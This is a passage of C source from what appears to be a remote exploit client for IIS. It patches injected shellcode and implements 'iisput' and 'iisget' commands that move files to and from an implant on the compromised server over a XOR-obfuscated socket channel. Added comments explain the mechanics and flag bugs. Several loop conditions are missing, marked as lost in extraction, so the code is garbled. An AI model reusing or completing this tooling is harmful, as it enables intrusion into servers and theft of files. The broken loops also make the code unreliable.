k=*(int *)(shellbuff+i+1);
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43;   // inc ebx
shellbuff[i+2]=0x4b;    // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}

/* Console command "iisput <local> [remote]": upload a local file to the
 * implant as "put " + 4-byte size + remote name, then the raw contents in
 * 0x800-byte chunks through newsend().  The socket is switched to blocking
 * for the transfer.  Caveats visible in the code: filename=="\x0" compares
 * pointers to a string literal (works only with literal pooling); fpt is a
 * FILE* holding a HANDLE; the CreateFile result is never checked; the
 * remote name is strcpy'd into a 0x2000-byte stack buffer although it comes
 * from a gets() line. */
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
/* first blank-separated word -> filename, second -> filename2 */
for(i=0;i /* condition lost in extraction */ if(*str!=' '){ filename=str; break; } }
for(;i /* condition lost in extraction */ if(*str==' ') { *str=0; break; } }
++i;
++str;
for(;i /* condition lost in extraction */ if(*str!=' '){ filename2=str; break; } }
for(;i /* condition lost in extraction */ if(*str==' ') { *str=0; break; } }
if(filename=="\x0") {
printf("\n iisput filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);   /* blocking for the transfer */
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);   /* no-op read-back */
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
newsend(fd,buff,size,0);   /* note: newsend XORs buff in place */
//          Sleep(0100);
filesize-=size;
}
}
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);   /* back to non-blocking for the console */
printf("\n put file ok!\n");
Sleep(1000);
}

/* Console command "iisget <local> [remote]": ask the implant for a file
 * ("get " + remote name), wait for the 8-byte "size" header (up to 100
 * empty reads), then write the body to the local file until the announced
 * size has arrived.  Same caveats as iisput: literal pointer comparison,
 * FILE* holding a HANDLE, unchecked CreateFileA, strcpy of a gets() word
 * into a 0x2000-byte stack buffer. */
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i /* condition lost in extraction */ if(*str!=' '){ filename=str; break; } }
for(;i /* condition lost in extraction */ if(*str==' ') { *str=0; break; } }
++i;
++str;
for(;i /* condition lost in extraction */ if(*str!=' '){ filename2=str; break; } }
for(;i /* condition lost in extraction */ if(*str==' ') { *str=0; break; } }
if(filename=="\x0") {
printf("\n iisget filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);
j=0;
ioctlsocket(fd, FIONBIO, &j);   /* blocking; recv is bounded by the 8 s SO_RCVTIMEO set in main */
i=0;
filesize=0;
j=0;
/* Anything that is not the "size" header is console output and is printed */
while(j<100){
//  Sleep(100);
i=newrecv(fd,buff,0x800,0);
if(i>0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
/* file data that arrived in the same read as the header */
if(i>8){
i-=8;
WriteFile(fpt,buff+8,i,&i,NULL);
filesize-=i;
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
WriteFile(fpt,buff,size,&size,NULL);
filesize-=size;
}
else {
if(size==0) {
printf("\n ftp close \n ");   /* peer closed; loop keeps spinning while filesize>0 */
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}

/* recv() wrapper: after "XORDATA" has been seen, XOR the received bytes
 * with the receive keystream (state in the global lockintvar1).  The loop
 * bound was lost in extraction; presumably it runs over the k bytes read,
 * so a negative return (error / would-block) decodes nothing.  Returns
 * recv()'s result unchanged. */
int newrecv(int fd,char *buff,int size,int flag)
{
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i /* condition lost in extraction */ lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar;
}
}
return(k);
}

/* send() wrapper: XOR the caller's buffer IN PLACE with the send keystream
 * (state in the global lockintvar2), then send it.  Unlike newrecv it
 * does not look at xordatabegin.  Callers must not reuse buff as plaintext
 * afterwards.  Returns send()'s result. */
int newsend(int fd,char *buff,int size,int flag)
{
int i;
for(i=0;i /* condition lost in extraction */ lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar;
}
return(send(fd,buff,size,flag));
}